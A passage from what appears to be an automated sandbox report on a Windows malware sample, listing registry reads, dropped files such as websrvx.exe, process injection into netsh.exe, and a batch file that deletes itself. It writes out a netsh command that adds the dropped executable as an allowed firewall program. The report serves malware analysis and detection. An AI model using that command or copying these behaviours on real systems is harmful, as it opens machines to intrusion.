HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKLM\​System\​CurrentControlSet\​Control\​Nls\​Language Groups 
HKLM\​System\​CurrentControlSet\​Control\​Nls\​Locale  00000409 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Command Processor  CompletionChar 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Command Processor  DefaultColor 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Command Processor  EnableExtensions 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 

4.b) cmd.exe - File Activities

  - Files Deleted:  
C:\sample.exe
c:\353454543.bat

  - Files Read:  
c:\353454543.bat

  - Memory Mapped Files:  
File Name
c:\353454543.bat

5. services.exe

  - General information about this executable  
Analysis Reason: NtConnectPort(\RPC Control\ntsvcs was called. 
Filename: services.exe 
MD5: 0e776ed5f7cc9f94299e70461b7b8185 
SHA-1: cb5a33cec4c7b8ef4bd5dc8c241005b66b26cbbf 
File Size: 108544 Bytes
Command Line: C:\WINDOWS\system32\services.exe 
Process-status at analysis end: alive 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​NCObjAPI.DLL  0x5F770000  0x0000C000 
C:\​WINDOWS\​system32\​MSVCP60.dll  0x76080000  0x00065000 
C:\​WINDOWS\​system32\​SCESRV.dll  0x7DBD0000  0x00051000 
C:\​WINDOWS\​system32\​AUTHZ.dll  0x776C0000  0x00012000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​USERENV.dll  0x769C0000  0x000B4000 
C:\​WINDOWS\​system32\​umpnpmgr.dll  0x7DBA0000  0x00021000 
C:\​WINDOWS\​system32\​WINSTA.dll  0x76360000  0x00010000 
C:\​WINDOWS\​system32\​NETAPI32.dll  0x5B860000  0x00055000 
C:\​WINDOWS\​system32\​ShimEng.dll  0x5CB70000  0x00026000 
C:\​WINDOWS\​AppPatch\​AcAdProc.dll  0x47260000  0x0000F000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 
C:\​WINDOWS\​system32\​VERSION.dll  0x77C00000  0x00008000 
C:\​WINDOWS\​system32\​eventlog.dll  0x77B70000  0x00011000 
C:\​WINDOWS\​system32\​PSAPI.DLL  0x76BF0000  0x0000B000 
C:\​WINDOWS\​system32\​WS2_32.dll  0x71AB0000  0x00017000 
C:\​WINDOWS\​system32\​WS2HELP.dll  0x71AA0000  0x00008000 
C:\​WINDOWS\​system32\​wtsapi32.dll  0x76F50000  0x00008000 

5.a) services.exe - Registry Activities

  - Registry Keys Created:  
HKLM\​System\​CurrentControlSet\​Enum\​Root\​LEGACY_TAPISRV\​0000\​Control
HKLM\​System\​CurrentControlSet\​Enum\​Root\​LEGACY_RASMAN\​0000\​Control

  - Registry Values Modified:  
Key Name New Value
HKLM\​System\​CurrentControlSet\​Enum\​Root\​LEGACY_RASMAN\​0000\​Control  ActiveService  RasMan 
HKLM\​System\​CurrentControlSet\​Enum\​Root\​LEGACY_TAPISRV\​0000\​Control  ActiveService  TapiSrv 

  - Registry Values Read:  
Key Name Value Times
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0303\​4&2C5A7332&0  ClassGUID  {4D36E96B-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0400\​4&2C5A7332&0  ClassGUID  {4D36E978-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0501\​1  ClassGUID  {4D36E978-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0700\​4&2C5A7332&0  ClassGUID  {4D36E969-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0A03\​1  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0F13\​4&2C5A7332&0  ClassGUID  {4D36E96F-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI_HAL\​PNP0C08\​0  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​DISPLAY\​DEFAULT_MONITOR\​4&2946A9FF&0&11223344&00&02  ClassGUID  {4D36E96E-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​IDE\​CDROMQEMU_QEMU_CD-ROM________________________0.9.____\​4D51303030302033202020202020202020202020  ClassGUID  {4D36E965-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​IDE\​DISKQEMU_HARDDISK___________________________0.9.1___\​4D51303030302031202020202020202020202020  ClassGUID  {4D36E967-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ISAPNP\​READDATAPORT\​0  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​LPTENUM\​MICROSOFTRAWPORT\​5&34A37E9F&0&LPT1  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCIIDE\​IDECHANNEL\​4&3DE75EA&0&0  ClassGUID  {4D36E96A-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCIIDE\​IDECHANNEL\​4&3DE75EA&0&1  ClassGUID  {4D36E96A-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_1013&DEV_00B8&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&10  ClassGUID  {4D36E968-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&18  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&18  DeviceDesc  Realtek RTL8029(AS)-based Ethernet Adapter (Generic) 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&18  Driver  {4D36E972-E325-11CE-BFC1-08002BE10318}\​0001 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_8086&DEV_1237&SUBSYS_00000000&REV_02\​3&13C0B0C5&0&00  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_8086&DEV_7000&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&08  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_8086&DEV_7010&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&09  ClassGUID  {4D36E96A-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​ACPI_HAL\​0000  ClassGUID  {4D36E966-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​DMIO\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​FTDISK\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_AFD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_BEEP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_DMBOOT\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_DMLOAD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_FIPS\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_GPC\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_HTTP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_IPNAT\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_IPSEC\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_KSECDD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_MNMDD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_MOUNTMGR\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NDISTAPI\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NDISUIO\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NDIS\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NDPROXY\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NETBT\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_NULL\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_PARTMGR\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_PARVDM\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_RASACD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_RDPCDD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_TCPIP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_VGASAVE\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_VOLSNAP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_WANARP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMACM  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMDRV  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMMCI  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMVCD  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MEDIA\​MS_MMVID  ClassGUID  {4D36E96C-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_L2TPMINIPORT\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_NDISWANIP\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_NDISWANIP\​0000  DeviceDesc  WAN Miniport (IP) 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_NDISWANIP\​0000  Driver  {4D36E972-E325-11CE-BFC1-08002BE10318}\​0008 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PPPOEMINIPORT\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PPTPMINIPORT\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PSCHEDMP\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PSCHEDMP\​0001  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​MS_PTIMINIPORT\​0000  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​RDPDR\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​RDP_KBD\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​RDP_MOU\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​SYSTEM\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​SYSTEM\​0001  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​SYSTEM\​0002  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​STORAGE\​VOLUME\​1&30A96598&0&SIGNATURE95619561OFFSET7E00LENGTH13F291800  ClassGUID  {71A27CDD-812A-11D0-BEC7-08002BE2092F} 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​PlugPlay  PlugPlayServiceType 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​RasMan\​Enum  Root\​LEGACY_RASMAN\​0000 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​RasMan\​Enum  Count 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​RpcSs\​Enum  Root\​LEGACY_RPCSS\​0000 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​RpcSs\​Enum  Count 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​TapiSrv\​Enum  Root\​LEGACY_TAPISRV\​0000 
HKLM\​SYSTEM\​CONTROLSET001\​SERVICES\​TapiSrv\​Enum  Count 
HKLM\​System\​CurrentControlSet\​Services\​PlugPlay  ObjectName  LocalSystem 
HKLM\​System\​CurrentControlSet\​Services\​RasMan  ImagePath  %SystemRoot%\​system32\​svchost.exe -k netsvcs 
HKLM\​System\​CurrentControlSet\​Services\​RasMan  ObjectName  LocalSystem 
HKLM\​System\​CurrentControlSet\​Services\​RpcSs  ObjectName  NT Authority\​NetworkService 
HKLM\​System\​CurrentControlSet\​Services\​TapiSrv  ImagePath  %SystemRoot%\​System32\​svchost.exe -k netsvcs 
HKLM\​System\​CurrentControlSet\​Services\​TapiSrv  ObjectName  LocalSystem 

5.b) services.exe - File Activities

  - Files Read:  
C:\ntsvcs, Flags: Named pipe

  - Files Modified:  
C:\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER, Flags: Named pipeinfo
C:\WINDOWS\system32\config\SysEvent.Evtinfo
C:\ntsvcs, Flags: Named pipeinfo

  - File System Control Communication:  
File Control Code Times
C:\net\NtControlPipe4, Flags: Named pipe  0x0011C017 
C:\ntsvcs, Flags: Named pipe  0x0011001C 

6. jopaxx_1211198010.exe

  - General information about this executable  
Analysis Reason: Started by ld02.exe 
Filename: jopaxx_1211198010.exe 
MD5: 9c9d22b9299b594597ea304f8a79066c 
SHA-1: 40aa4097589d51d5aefca2624ad3b816987c4a4e 
File Size: 9728 Bytes
Command Line: C:\DOCUME~1\user\LOCALS~1\Temp\\jopaxx_1211198010.exe 
Process-status at analysis end: alive 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 
C:\​WINDOWS\​system32\​iphlpapi.dll  0x76D60000  0x00019000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​WS2_32.dll  0x71AB0000  0x00017000 
C:\​WINDOWS\​system32\​WS2HELP.dll  0x71AA0000  0x00008000 
C:\​WINDOWS\​system32\​ole32.dll  0x774E0000  0x0013D000 
C:\​WINDOWS\​system32\​OLEAUT32.dll  0x77120000  0x0008B000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 

  - Run-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 
C:\​WINDOWS\​system32\​VERSION.dll  0x77C00000  0x00008000 

  - SigBuster Output  
UPX All_Versions SN:1634

  - Ikarus Virus Scanner  
Win32.SuspectCrc (Sig-Id:26535175)

6.a) jopaxx_1211198010.exe - Registry Activities

  - Registry Values Read:  
Key Name Value Times
HKLM\​SYSTEM\​WPA\​MediaCenter  Installed 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  AuthenticodeEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  TransparentEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKLM\​System\​CurrentControlSet\​Control\​ServiceCurrent   
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 

6.b) jopaxx_1211198010.exe - File Activities

  - Files Created:  
C:\Program Files\websrvx
C:\Program Files\websrvx\websrvx.exe

  - Files Modified:  
C:\Program Files\websrvx\websrvx.exeinfo

  - Directories Created:  
C:\Program Files\websrvx

  - Memory Mapped Files:  
File Name
C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe
C:\WINDOWS\system32\Apphelp.dll
C:\WINDOWS\system32\netsh.exe
C:\Windows\AppPatch\sysmain.sdb

6.c) jopaxx_1211198010.exe - Process Activities

  - Processes Created:  
Executable Command Line
C:\WINDOWS\system32\netsh.exe   
  netsh add allowedprogram "C:\Program Files\websrvx\websrvx.exe" websrvx ENABLE 

  - Remote Threads Created:  
Affected Process
C:\WINDOWS\system32\netsh.exe

  - Foreign Memory Regions Read:  
Process: C:\WINDOWS\system32\netsh.exe

  - Foreign Memory Regions Written:  
Process: C:\WINDOWS\system32\netsh.exe

7. tt_1211198012.exe

  - General information about this executable  
Analysis Reason: Started by ld02.exe 
Filename: tt_1211198012.exe 
MD5: ee8d222943c128e8cedf010c0cb03d88 
